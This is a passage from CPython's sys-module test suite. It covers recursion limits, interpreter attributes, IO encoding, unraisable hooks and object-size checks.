sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
# The error message is specific to CPython
@test.support.cpython_only
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: _Py_CheckRecursiveCall: "
b"Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
class A:
class B:
class X(Exception):
pass
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
testName = 'test_original_unraisablehook_exception_qualname'
self.assertIn(f"{testName}.<locals>.A.B.X", report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
